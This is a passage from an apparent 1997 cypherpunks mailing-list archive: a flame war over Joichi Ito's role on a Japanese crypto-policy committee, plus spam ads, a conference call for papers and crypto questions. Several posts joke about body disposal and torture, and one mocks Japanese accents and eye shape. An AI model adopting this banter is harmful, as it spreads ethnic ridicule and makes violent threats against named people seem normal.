>a result of the country's geography, population and history.
>  A "No Farting" sign which might reek of totalitarianism when placed
>on the open range, might well seem less so when placed in a two-man
>tent occupied by six people. Environment, geography and the history
>of a a country, society and its people, all play a part in the degree
>to which an individual will view their personal position in regard to
>the society and government around them. And each will perceive the way
>in which they feel they can best promote their beliefs within their
>society and government.

Whatever. A good friend of mine just got back from 10 years in Japan
(Tsukuba and Tokyo), and has filled me in on the "nail that stands up"
stuff. It's hackneyed.

The point is, if Joichi Ito wants to ever be taken at all seriously, as a
reasonable objective reporter of what is happening, his co-opting by the
Japanese Self Defense Forces, Chobetsu, etc., for this "committee" on
crypto policy, must be scrutinized, and almost certainly criticized.

>  It seemed to me that after Jim Bell's arrest, most of the posts to
>the list posted an almost-standard disclaimer: "Actually, although
>I hardly knew the man, thought he was a _loon_, and _disagreed_ with
>most of what he had to say..."

Actually, more people were openly discussing his ideas than before.

I, for one, never dismissed the ideas. I think his ideas are derivative
(cf. my entire sections in the 3-year-old Cyphernomicon, for example). And
his idiosyncratic way of presenting them ("Something _wonderful_ is about
to happen!," "I have an idea") gave the appearance that he was close to
being a loon, if not actually one.

Personally, I see nothing to be gained in the bigger scheme of things by
targetting the Portland office of the IRS, for example. Nor do I think his
"Assassination Politics" market would work in the way Bell claimed it
would: many pointed this out, and Bell never seriously responded (that I
can recall, but, then, I deleted many of his posts).

This has nothing to do with your presumptive point, that we were frightened
by the IRS and other LEA actions and then sought to distance ourselves from
Bell's idea. Nothing could be further from the truth. I, for one, have made
it clear that I will not  inform on Bell, or answer LEA questions unless
subpoenaed or charged. (And possibly not even then. I have not been a
co-conspirator of Bell's, and any questioning of me can be done at my
standard consulting rates. I am willing to be an "expert witness" on some
topics, if my schedule is free.)



>> And nothing but mischief will come out any meetings with government on
>> "crypto policy," as their goals can never be our goals. At least in the
>> U.S., despite obvious flaws, we have a "Congress shall make no law"
>> provision which _tends_ to make government meddling in speech, such as
>> meddling in crypto, more difficult.
>
>  I hope that the "flag" Tim is wrapping himself in isn't the same one
>that he was burning yesterday.
>  {Not that I'm accusing Tim of being purposely deceitful. It's just
>that when we throw a "leaner" instead of a "ringer," they sometimes
>lean in opposite directions.}

Utter bullshit. I have cited the First, Second, and other provisions of the
Constitution for the 5 years of this list. That I would prefer an even more
anarchistic, market-oriented system than we now have, or that I dislike the
hundreds of thousands of laws passed over the last 50 years, is no reason
not to use the protections of the Constitution.  And the line between an
anarchocapitalist and a strict constuctionist is fine indeed. Anyone who
thinks this is "deceitful" is probably one of those folks who says, "Oh,
yeah, well if you dislike government why don't you just refuse to drive on
public roads? Some people are just born stupid.


--Tim May

There's something wrong when I'm a felon under an increasing number of laws.
Only one response to the key grabbers is warranted: "Death to Tyrants!"
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From announce at lists.zdnet.com  Sun Aug  3 22:39:16 1997
From: announce at lists.zdnet.com (announce at lists.zdnet.com)
Date: Mon, 4 Aug 1997 13:39:16 +0800
Subject: Computer Magazine Archive Special Offer!
Message-ID: 



----------------------------------------------------------------
   ZDNET ANNOUNCEMENT        8/4/97
----------------------------------------------------------------

ZDNet Members:  Take advantage of a special risk-free trial offer 
to Computer Magazine Archive!

====================
http://cma.zdnet.com
====================

Subscribe to Computer Magazine Archive to:

* Follow your competitors
* Track industry trends
* Keep up with the latest product reviews 
* Monitor recent IPOs and high-tech investments, or
* Research just about anything related to high-tech

Computer Magazine Archive is a powerful database of over 74,000
articles from the industry's most popular and influential 
publications. Everything you need to research the computer industry
is as close as your desktop computer - so accessible, you may 
never need to search through piles of old publications or your 
overstuffed clipping file again.  

---- Limited-time, RISK-FREE Trial Offer ----

Similar information databases typically sell for thousands of
dollars a year. With Computer Magazine Archive, you can access the
same information for only $4.95 a month.  Subscribe now and if
you're not completely satisfied, simply cancel by August 24th and 
pay nothing. It's risk-free! 

Give Computer Magazine Archive a test-drive today.  It's the 
most comprehensive and affordable database of computing articles
you'll find on the Web--or possibly anywhere.

====================
http://cma.zdnet.com
====================

_______________________________________________________________
ZDNet Announcements are periodic notices of new features,
special events and free offers available to members of ZDNet.

 --To subscribe to ZDNet Announcements, please send mail to:
announce-on at lists.zdnet.com
You can leave the subject and body blank.

 --To unsubscribe to ZDNet Announcements, please send mail to:
announce-off at lists.zdnet.com
You can leave the subject and body blank.
_______________________________________________________________

Powered by Mercury Mail: http://www.merc.com

===============================================================






From jito at eccosys.com  Sun Aug  3 22:48:40 1997
From: jito at eccosys.com (Joichi Ito)
Date: Mon, 4 Aug 1997 13:48:40 +0800
Subject: Joichi gives up / Tim Throws a "Leaner" / Re: Tim Speaks the Truth /  Re: Tim Misfires / Re: Joichi Ito as a Junior Policeman
Message-ID: <199708040542.OAA12229@eccosys.com>



OK. I give up. I think DreamMonger's last comment about at least sort of
believing in my intentions is about the best it will get for me here.
Tim, you're in my killfile now too so I'm not going to respond directly to
your
comments.

Now at least when I am going through the meatgrinder, I won't know if it is
a cypherpunk or a Japanese fascist who's sending me through.

At 05:46 97/08/04 +0200, Anonymous wrote:
>   I hope Joichi Ito paid enough attention to the OKC bombing to realize
> that some surgeons are less skilled than others, and that there is a
> risk in remaining too long in close proximity with cancerous tissue.

Some Japanese conservatives probably think *I* am the cancerous tissue that
their people shouldn't hang out with...

- Joi

--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From ravage at ssz.com  Sun Aug  3 22:56:34 1997
From: ravage at ssz.com (Jim Choate)
Date: Mon, 4 Aug 1997 13:56:34 +0800
Subject: Tim Throws a "Leaner" / Re: Tim Speaks the Truth (fwd)
Message-ID: <199708040544.AAA32292@einstein.ssz.com>



Forwarded message:

> Date: Sun, 3 Aug 1997 22:02:24 -0700
> From: Tim May 
> Subject: Re: Tim Throws a "Leaner" / Re: Tim Speaks the Truth

> As for Joichi's message quoted above, he should hope to hell that he wakes
> up and realizes that not even in Japan can journalists--which is what I
> thought he once was, or claimed to be--serve on Ministry committees to
> decide how citizen-units may communicate!
> 
> Any journalist in Europe or in the U.S. would be seen as having irreparably
> compromised his journalistic objectivity by serving on such a panel! And
> properly so, of course.

As long as they were representing their personal opinions and not acting as
a journalist (ie being paid by a 3rd party) and they disclose the action
there would be compromise on objectivity.

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From ravage at ssz.com  Sun Aug  3 22:58:05 1997
From: ravage at ssz.com (Jim Choate)
Date: Mon, 4 Aug 1997 13:58:05 +0800
Subject: Suggested book
Message-ID: <199708040548.AAA32327@einstein.ssz.com>



Hi,

Somebody (I'm too lazy to check the archives) mentioned "The Soveriegn
Individual" by Davisdson & Rees-Mogg. I happened to stumble across it in the
bookstore so I bought it.

While I am only about a 3rd through it and clearly disagree with several
points the main thesis is worth examining. Strongly suggested for any cpunk.

The Sovereign Individual: How to survive and thrive during the collapse
                          of the welfare state
J.D. Davidson & Lord W. Rees-Mogg
ISBN 0-684-81007-7
$25.00

    ____________________________________________________________________
   |                                                                    |
   |          Participation requires more than just bitching!           |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage at ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|






From nobody at REPLAY.COM  Mon Aug  4 00:00:14 1997
From: nobody at REPLAY.COM (Anonymous)
Date: Mon, 4 Aug 1997 15:00:14 +0800
Subject: Palladin Press Announces "Home Composting" by Tim C. May
Message-ID: <199708040642.IAA12930@basement.replay.com>



Tim May wrote: 
> At 8:46 PM -0700 8/3/97, Anonymous wrote:
> >Joichi Ito wrote:
> >> As for Tim's message... I keep worrying (when I am in Japan) that I'm too
> >> radical, so it's nice to hear from someone who is really hardcore to put
> >> a wimp like me in my place. ;-P

> >  Actually, when Tim puts someone in what he considers to be their
> >place, it usually involves the purchase of a tombstone.
 
> Actually, the trick is to avoid having the body discovered. What goes into
> the 10 h.p TroyBilt Chipper/Shredder comes out not needing any kind of
> tombstone at all.

  This may explain why my paramilitarist neighbor's garden always does
so much better than mine. (It could also explain the bone fragments in
his garden potatoes.)

> Not that I have ever advocated killing mere folks like Joichi with whom I
> disagree strongly. (A new quote: "Killfiles don't need tombstones.")

  Definition of a CypherPunk tragedy: "A Killfile being deleted without
an ASCII Art message in it." 

> The point is, if Joichi Ito wants to ever be taken at all seriously, as a
> reasonable objective reporter of what is happening, his co-opting by the
> Japanese Self Defense Forces, Chobetsu, etc., for this "committee" on
> crypto policy, must be scrutinized, and almost certainly criticized.

  The JSDF, Chobetsu, etc., might well say the same thing about his
co-opting by the CypherPunks.
  I believe that you are right about scrutinizing and criticizing the
work of all politicians and reporters, but I doubt any of us could
ultimately reach agreement on what exactly constitutes being co-opted,
or exactly when one of "us" becomes one of "them."
  I value Declan McCullagh's reporting on privacy and crypto issues,
but I recognize the need to ask him to "take his shirt off" every now
and again so we can check to see if he has an alien creature stuck
to his back, controlling his mind.
  The problem with sending spies and secret agents into the enemy
camps has always been that they may grow to like the enemy's life-
style a little *too* much.

> >> And nothing but mischief will come out any meetings with government on
> >> "crypto policy," as their goals can never be our goals. At least in the
> >> U.S., despite obvious flaws, we have a "Congress shall make no law"
> >> provision which _tends_ to make government meddling in speech, such as
> >> meddling in crypto, more difficult.
> >
> >  I hope that the "flag" Tim is wrapping himself in isn't the same one
> >that he was burning yesterday.
> >  {Not that I'm accusing Tim of being purposely deceitful. It's just
> >that when we throw a "leaner" instead of a "ringer," they sometimes
> >lean in opposite directions.}
 
> Utter bullshit. I have cited the First, Second, and other provisions of the
> Constitution for the 5 years of this list. That I would prefer an even more
> anarchistic, market-oriented system than we now have, or that I dislike the
> hundreds of thousands of laws passed over the last 50 years, is no reason
> not to use the protections of the Constitution.

  Don't shoot, I was just being fascetious.
  To tell the truth, I find it confusing these days to figure out
*which*
flag is being burned, or used to wrap oneself in, these days. Is it the
flag that defends freedom or the flag that defends children? Is it the
flag that defends the Constitution or the flag that defends "national
security?" {And if it is the flag that defends the Constitution, then
*which* Constitution? The one the founders wrote, or the one being used
as a doormat at the Whitehouse?)
  
> And the line between an
> anarchocapitalist and a strict constuctionist is fine indeed. Anyone who
> thinks this is "deceitful" is probably one of those folks who says, "Oh,
> yeah, well if you dislike government why don't you just refuse to drive on
> public roads?

  Or, perhaps, "If you dislike government why don't you just refuse to 
participate in it?"
  Different strokes for different folks. Sometimes the pen is indeed
mightier than the sword (or a Ryder truck) and sometimes the almighty
dollar is mightier than either. Regardless, "We have met the enemy, and
he is us." probably comes closer to the heart of the problem with our
societies and governments than any socio-political analysis of the 
issues and events of our time.
  The problem is not who writes what, and the reasons behind it, the
problem is the aspect of our human nature which wants us to believe
in Santa Claus, benevolent government and the goodness of our fellow
man, despite evidence to the contrary. The problem is not who blows
up a building, or a city, the problem is the aspect of our human 
nature which wants us to paint the face of justice or terrorism on
the action instead of recognizing the injustice, regardless of the
necessity, or lack thereof, of the action.

  The bottom line is that, despite our personal beliefs as to "the
meaning of life" and the values and beliefs it should be lived by,
it may well be that this planet's true purpose is to serve as a
compost pile to provide nourishment for more intelligent forms of
life being grown/evolved elsewhere.
  {Keep an eye out for asteroids shaped like a "TroyBilt."}

TruthMonger






From promotions at web-promotions.com  Mon Aug  4 15:02:48 1997
From: promotions at web-promotions.com (promotions at web-promotions.com)
Date: Mon, 4 Aug 1997 15:02:48 -0700 (PDT)
Subject: Regarding your check
Message-ID: <199708041615.MAA10820@loki.atcon.com>


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message has been sent by Web-Promotions.Com  and adheres to all North American laws pertaining to Bulk Email.

If you would like to be removed from future mailings please respond back to the sending address
and put REMOVE in the SUBJECT BOX. Placing the word remove in any other area of the email may go unnoticed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Clickers paying from 3� to 5� per click PLUS BONUS up to $500 paid to sites
with QUALITY traffic each and EVERY month.

We are looking for serious players who want to make serious money.

No messing around, WE PAY ON TIME, WEEKLY and by WIRE if you choose.

Site size for bonus is not important, just the QUALITY of your traffic.

Check out http://www.clickers.net for more information.

WHAT HAVE YOU GOT TO LOSE?



Richard
Clickers Admin





~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This message has been sent by Web-Promotions.Com  and adheres to all North American laws pertaining to Bulk Email.

If you would like to be removed from future mailings please respond back to the sending address
and put REMOVE in the SUBJECT BOX. Placing the word remove in any other area of the email may go unnoticed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From Michael.Johnson at mejl.com  Mon Aug  4 00:12:21 1997
From: Michael.Johnson at mejl.com (Mike)
Date: Mon, 4 Aug 1997 15:12:21 +0800
Subject: Microsoft RAS encryption?
In-Reply-To: <3.0.3.32.19970801101506.0092b420@localhost>
Message-ID: <3.0.3.32.19970804085944.0091fd80@localhost>



sameer wrote:
>	See www.l0pht.com
>> Does anybody know how Microsoft RAS implements data encryption? Apparently
>> (http://www.microsoft.com/kb/articles/q136/6/34.htm) they use RC4, but is
>> this stuff documented somewhere, like in an RFC?

What I can find at www.l0pht.com only deals with password authentication.
I'm more interested in the RC4 data encryption that Microsoft RAS servers
and clients are using. That is, once a PPP session is established and
MSCHAP is used to authenticate the session, the secret from MSCHAP is
reused as two RC4 keys with 40 or 128 bit keys (US or International
versions). But I can't find any documents on exactly how this works.

Mike.






From R.Hirschfeld at cwi.nl  Mon Aug  4 15:30:44 1997
From: R.Hirschfeld at cwi.nl (Ray Hirschfeld)
Date: Mon, 4 Aug 1997 15:30:44 -0700 (PDT)
Subject: Financial Cryptography '98 Call for Papers
Message-ID: 


		      Financial Cryptography '98
		   Second International Conference
		 February 23-26, 1998, Anguilla, BWI
			   CALL FOR PAPERS


General Information:

Financial Cryptography '98 (FC98) is a conference on the security of
digital financial transactions.  Meetings alternate between the island
of Anguilla in the British West Indies and other locations.  This
second meeting will be held in Anguilla on February 23-26, 1998.  FC98
aims to bring together persons involved in both the financial and data
security fields to foster cooperation and exchange of ideas.

Original papers are solicited on all aspects of financial data
security and digital commerce in general, including

    Anonymous Payments                      Fungibility       
    Authentication                          Home Banking       
    Communication Security                  Identification     
    Conditional Access                      Implementations    
    Copyright Protection                    Loss Tolerance     
    Credit/Debit Cards                      Loyalty Mechanisms 
    Currency Exchange                       Legal Aspects      
    Digital Cash                            Micropayments      
    Digital Receipts                        Network Payments   
    Digital Signatures                      Privacy Issues     
    Economic Implications                   Regulatory Issues  
    Electronic Funds Transfer               Smart Cards        
    Electronic Purses                       Standards
    Electronic Voting                       Tamper Resistance
    Electronic Wallets                      Transferability


Instructions for Authors:

Send a cover letter and 12 copies of an extended abstract to be
received by November 17, 1997 (or postmarked by November 7, 1997 and
sent via airmail) to the Program Chair at the address given below.

The extended abstract should start with the title, the names of the
authors, and an abstract followed by a succinct statement appropriate
for a non-specialist reader specifying the subject addressed, its
background, the main achievements, and their significance to financial
data security.  Submissions are limited to 15 single-spaced pages of
12pt type.  Notification of acceptance or rejection will be sent to
authors no later than January 12, 1998.

Authors of accepted papers must guarantee that their paper will
be presented at the conference.


Proceedings:

Proceedings of the conference will be published by Springer Verlag in
their Lecture Notes in Computer Science (LNCS) series.  Preproceedings
will be available at the conference, but final versions will not be
due until afterwards, giving authors the opportunity to revise their
papers based on presentations and discussions at the meeting.
Instructions and deadlines for submission of final papers will be sent
later to authors of accepted papers.


Rump Session:

In addition to the regular conference program, a rump session will be
held to provide an opportunity for less formal presentations.
Although the rump session will be organized during the conference
itself, any advance proposals may be sent to the Program Co-Chair at
the email address given below.  Rump session contributions will not
appear in the conference proceedings.


Stipends:

A very limited number of stipends may be available to those unable to
obtain funding to attend the conference.  Students whose papers are
accepted and who will present the paper themselves are encouraged to
apply if such assistance is needed.  Requests for stipends should be
addressed to one of the General Chairs.


Registration:

Information about conference registration and on travel, hotels, and
Anguilla itself will follow in a separate general announcement.  There
will be special discount registration rates for authors of accepted
submissions, full-time academics, and students.


Workshop:

A workshop, intended for anyone with commercial software development
experience who wants hands-on familiarity with the issues and
technology of financial cryptography, is planned in conjunction with
FC98, to be held during the week preceding the conference.  For
information, please contact one of the General Chairs.


Send Submissions to:

Rafael Hirschfeld
FC98 Program Chair
CWI
Kruislaan 413
1098 SJ Amsterdam
The Netherlands
email: ray at cwi.nl
phone: +31 20 592 4169
fax: +31 20 592 4199


Send Rump Session Contributions to:

Matthew Franklin
FC98 Program Co-Chair
email: franklin at research.att.com


Program Committee:

Matt Blaze, AT&T Laboratories--Research, Florham Park, NJ, USA
Antoon Bosselaers, Katholieke Universiteit Leuven, Leuven, Belgium
Yves Carlier, Bank for International Settlements, Basel, Switzerland
Walter Effross, Washington College of Law, American U., Washington DC, USA
Matthew Franklin, AT&T Laboratories--Research, Florham Park, NJ, USA
Michael Froomkin, U. Miami School of Law, Coral Gables, FL, USA
Rafael Hirschfeld, CWI, Amsterdam, The Netherlands
Alain Mayer, Bell Laboratories/Lucent Technologies, Murray Hill, NJ, USA
Moni Naor, Weizmann Institute of Science, Rehovot, Israel
Frank Trotter, Mark Twain Ecash/Mercantile Bank, St. Louis, MO, USA
Doug Tygar, Carnegie Mellon University, Pittsburgh, PA, USA
Moti Yung, CertCo LLC (formerly: Bankers Trust E-Commerce), New York, NY, USA


General Chairs:

Robert Hettinga, Shipwright, Boston, MA, USA
   email: rah at shipwright.com
Vincent Cate, Offshore Information Services, Anguilla, BWI
   email: vince at offshore.com.ai


Exhibits and Sponsorship Manager:

Julie Rackliffe, Boston, MA, USA
   email: rackliffe at tcm.org


Workshop Leader:

Ian Goldberg, Berkeley, CA, USA
   email: iang at cs.berkeley.edu


Those interested in becoming a sponsor of FC98 or in purchasing
exhibit space, please contact the Exhibits and Sponsorship Manager.

A copy of this call for papers as well as other information about the
conference will be available at URL http://www.cwi.nl/conferences/FC98.





From tm at dev.null  Mon Aug  4 01:02:06 1997
From: tm at dev.null (TruthMonger)
Date: Mon, 4 Aug 1997 16:02:06 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up / Tim Throws a "Leaner" / Re: Tim Speaks the
Message-ID: <199708040739.BAA02500@wombat.sk.sympatico.ca>



Joichi Ito wrote:
> 
> OK. I give up. I think DreamMonger's last comment about at least sort of
> believing in my intentions is about the best it will get for me here.

  Sure, quit before we even have a chance to use the cheap shots we've
thought up since our last posts. Spoilsport.

> Tim, you're in my killfile now too so I'm not going to respond directly to
> your comments.

  Me neither. I'm going to use email.

> Now at least when I am going through the meatgrinder, I won't know if it is
> a cypherpunk or a Japanese fascist who's sending me through.

  It would probably be considered Politically Incorrect for me to
mention
that eye-shape might be a good indication, so I won't.
  Another indication might be whether your torturers are shouting,
"Confess!
You all an Ameliclan SPY!" or, "We kicked your ass in 'The Big One',
pal."
  If you haven't figured it out by the time you've been put completely
through the meatgrinder, you can still figure it out by noting whether
your remains are being mixed with rice and put in cabbage leaves, or
being coated with barbeque sauce and thrown on a grill.

> At 05:46 97/08/04 +0200, Anonymous wrote:
> >   I hope Joichi Ito paid enough attention to the OKC bombing to realize
> > that some surgeons are less skilled than others, and that there is a
> > risk in remaining too long in close proximity with cancerous tissue.
> 
> Some Japanese conservatives probably think *I* am the cancerous tissue that
> their people shouldn't hang out with...
 
  "Everybody needs somebody that they can look down on.
   That they can feel better than, at any time they please.
   Someone doing something dirty, decent folks can frown on.
   And if you can't find nobody else, then help yourself to me."
      - Kris Krisofferson

  It has been my experience that it is more fulfilling to be tortured by
CypherPunks than by Conservatives. 
  (And the physical meetings are more fun, too.)

TruthMonger






From jito at eccosys.com  Mon Aug  4 01:17:27 1997
From: jito at eccosys.com (Joichi Ito)
Date: Mon, 4 Aug 1997 16:17:27 +0800
Subject: Tim 1 - Joichi 0 - DreamMonger NULL / Re: Joichi gives up / Tim Throws a "Leaner" / Re: Tim Speaks the
Message-ID: <199708040810.RAA13649@eccosys.com>



At 01:42 97/08/04 EST, TruthMonger wrote:

>   Sure, quit before we even have a chance to use the cheap shots we've
> thought up since our last posts. Spoilsport.

> > Tim, you're in my killfile now too so I'm not going to respond directly to
> > your comments.
> 
>   Me neither. I'm going to use email.

OK. I was trying to not-so-elegantly back out of the big hole I dug for
myself.
To be completely honest, I am fascinated (I don't know if this is the right
word
here...) by this discussion and if we were f-t-f I would probably still be
engaged
but I find Tim's arguments too deep to write off, but I find myself without
enough
time right now to engage with my full attention...and if I don't give this my
full
attention, I'm sure I'll lose... so, I gave up... for now. I'll formulate my
thoughts
and next time, I'll think before I write. Maybe I'll wait for a chance to take
a
stab at Tim later on.


At 00:44 97/08/04 -0500, Jim Choate wrote:
> Forwarded message:
> 
> > Date: Sun, 3 Aug 1997 22:02:24 -0700
> > From: Tim May 
> > Subject: Re: Tim Throws a "Leaner" / Re: Tim Speaks the Truth

> > Any journalist in Europe or in the U.S. would be seen as having
irreparably
> > compromised his journalistic objectivity by serving on such a panel! And
> > properly so, of course.
> 
> As long as they were representing their personal opinions and not acting as
> a journalist (ie being paid by a 3rd party) and they disclose the action
> there would be compromise on objectivity.

Jim, I hope you meant to say "wound not be compromising" in the above
statement.
This may sound like an afterthought, but one of the reasons that I did
such a stupid thing as post my association with a police study group 
here was as a part of being very open about what I was doing and
trying to ask for advice on that basis. Also, FYI, I am not being paid
by the government or any 3rd party. I am not a "consultant" to the
government. I am an "outside expert". I am not representing the police
to the people of Japan, I am trying represent the peoples' interest to
the government... but I'll stop now before I get bashed again.

- Joi



--
Finger jito at nsm.eccosys.com or jito at garage.co.jp for PGP Key
Fingerprint for RSA PGP Key ID 0x0EE23A2D
0D3A 7AAA 3DA8 E7B3  3AF1 C6FA B7ED D834
Fingerprint for DSS/Diffie-Hellman PGP Key ID 0x2D9461F1
58F3 CA9A EFB8 EB9D DF18  6B16 E48D AF2A 2D94 61F1
Home Page: http://domino.garage.co.jp/jito/joihome.nsf
To subscribe to my personal mailing list send mailto:friends-subscribe at ito.com




From myattkk at bellatlantic.net  Mon Aug  4 17:21:11 1997
From: myattkk at bellatlantic.net (myattkk at bellatlantic.net)
Date: Mon, 4 Aug 1997 17:21:11 -0700 (PDT)
Subject: VIRGINIA CORP RECORDS/OFFICERS/RA
Message-ID: <199708050022.TAA27305@mail1.bellatlantic.net>


>From YOUR OFFICE or HOME enjoy convenient 24-HOUR ACCESS to:

************STATE CORPORATE FILING RECORDS************

>VIRGINIA 
-----Corporate/Charter Information (i.e. Resident Agent, Date of Incorporation, Status, State ID #, Amendments, Officers, Merger & Stock Info, Reserved/Registered/Old/Ficticious Names)

>MARYLAND
-----Charter & Personal Property Filings (i.e. Resident Agent, Date of Incorporation, Status, State ID #, Amendments, Film/folio/File Location of Abstracts, Last 2 years' Personal Property Tax Filings)

-----Uniform Commercial Code Filings (i.e. Debtors, Assignees, Secured Parties, Amendments & Status)

-----Real Property Public Release Information (i.e. Owner, Last Transfer, Assessment, Map, Parcel, Deed information, etc...)


No purchases, registration or subscription, only a nominal usage fee.  Excellent service for both occasional and frequent users of this information.  Most any communication software that gives you the use of a VT-220 terminal emulation will work with our system.  Just set up your communication software according to our instructions and 

$$$$$$$$$$$$$$$$$$$$$   GO  ONLINE  NOW! ! !   $$$$$$$$$$$$$$$$$$$

Call for more details,                 1-800-463-6009



///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From 56098393 at rocketmail.com  Mon Aug  4 17:56:17 1997
From: 56098393 at rocketmail.com (56098393 at rocketmail.com)
Date: Mon, 4 Aug 1997 17:56:17 -0700 (PDT)
Subject: Finally Found You :^)
Message-ID: <>


This site is the best that I have seen.
They Have Everything ;^)
Meet me in the chat area between
8pm and 1am. I will be either in the
Male or Female area, I like them both.
                  
http://www.adultfunshop.com
                  
I am there every night :^)
I Miss You
	Jenny ;^0~

P.S. Sorry I didn't write you earlier
     But my computer crashed and I lost
     your email address.  Found you on
     one of those People search engines.






From 56098393 at rocketmail.com  Mon Aug  4 17:56:17 1997
From: 56098393 at rocketmail.com (56098393 at rocketmail.com)
Date: Mon, 4 Aug 1997 17:56:17 -0700 (PDT)
Subject: Finally Found You :^)
Message-ID: <>


This site is the best that I have seen.
They Have Everything ;^)
Meet me in the chat area between
8pm and 1am. I will be either in the
Male or Female area, I like them both.
                  
http://www.adultfunshop.com
                  
I am there every night :^)
I Miss You
	Jenny ;^0~

P.S. Sorry I didn't write you earlier
     But my computer crashed and I lost
     your email address.  Found you on
     one of those People search engines.






From jya at pipeline.com  Mon Aug  4 04:25:30 1997
From: jya at pipeline.com (John Young)
Date: Mon, 4 Aug 1997 19:25:30 +0800
Subject: EC Report on Crypto
Message-ID: <1.5.4.32.19970804110047.00707678@pop.pipeline.com>



     4 August 1997, ComputerWorld:

     Report/ Encryption policy hurts trade 

     U.S. controls on the export of encryption technology and
     telecommunications equipment represent significant barriers
     to international trade, the European Commission said in a
     report last week. 

     The development of digital communications has prompted the
     need for improved protection against the unauthorized use of
     personal data, trade secrets, banking information and
     databases. Without that protection, it is unlikely that
     electronic commerce will take off, said one European
     Commission official. 

     The commission's 13th annual ``Report on United States
     Barriers to Trade and Investment'' said the U.S. is the
     dominant supplier of key computing components, and the
     country's limitations on the export of strong encryption
     products hurts the growth of electronic commerce. 

----------

Anyone with a URL for this report? The EC site is uncrackably
multi-lingual otiose.






From pgut001 at cs.auckland.ac.nz  Mon Aug  4 04:28:15 1997
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Mon, 4 Aug 1997 19:28:15 +0800
Subject: News: Spy Base Expanded
Message-ID: <87069251316788@cs26.cs.auckland.ac.nz>



  CLEAR Net - News
  Spy Base Expanded
 
  The Government has announced a planned expansion at Blenheim's Waihopai
  spybase to boost New Zealand's ability to monitor satellite communications.
 
  And the Prime Minister, Jim Bolger, says a change to the Crimes Act will
  allow the base to monitor phone calls by foreigners, which was formerly
  illegal.
 
Full story at
http://www.clear.net.nz/common/news/archives/articles/00001937.html.
 
Peter.
 






From dformosa at st.nepean.uws.edu.au  Mon Aug  4 05:11:58 1997
From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa})
Date: Mon, 4 Aug 1997 20:11:58 +0800
Subject: no government regulation of the net (was Re: bulk postage fine)
In-Reply-To: <199708031023.LAA00663@server.test.net>
Message-ID: 



-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Aug 1997, Adam Back wrote:

> David Formosa  writes:

[...]

> > You got to be jokeing, what about alomost every AOL vs. Cyberpromo or
> > Compuserve vs. Cyberpromo or all thouse other ISPs against Cyberpromo.

[...]

> Government backed legal systems are inefficient.  A purely anonymous
> transaction where both parties identity is well concealed is much more
> efficient.

I have truble seeing this working protocol wise,  what is to stop me
taking the money and running (or the product and running).  For some
things such as text and grafics it is possable to use a bye a bit type
protocol.  But for something like the password to the GAK database you
would have have trubble negosating the protocol without someone getting
ripped off.

>  There is no one to sue.  Fighting legal suits is expensive, especially
> in the US.

[...]

> Third party arbitrators holding with a copy of
> the contract, a deposit from each party in escrow, and a reputation as
> a fair arbitrator is much more efficient.

So the escrow agent will get sued instead of you. These agents will have
to pay massive insurance rates and thuse be very expencive to use.

There seems to be an underlieing object of this schem to screw the lawers.
While this is a wounderfull aim I don't think that this schem will do it
as most escrow agents are lawers or soliciters.

> It'll probably help if the arbitration service is anonymous also,

I don't see how you can mainige the joint targets of anonymousaty and
reputation in this schem.  I would be interested if you can.

[...]

> > The spammers if there advertising a servese will need someway for me to
> > contact them.  Some way for me to get the goods.  Just anonomising the
> > email will not hide there identy.  
> 
> True.  But how do you prove to one of these inefficent government
> courts that it is indeed the spam beneficiary who posted the spam.

Look at there email logs, paychecks to Spamford ect in the discovery
phase.

[...]

> > Any way pushing spammer email though most email remailers will cause
> > them to crash from sheare volume.
> 
> That's also not a good thing.

I didn't say it was.  Most likely the anon-admins will make use of
throtelers to stop e-spaming (I beleave thay do this for mail bombs)

- -- 
Please excuse my spelling as I suffer from agraphia see the url in my header. 
Never trust a country with more peaple then sheep.  ex-net.scum and proud
You Say To People "Throw Off Your Chains" And They Make New Chains For
Themselves? --Terry Pratchett

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

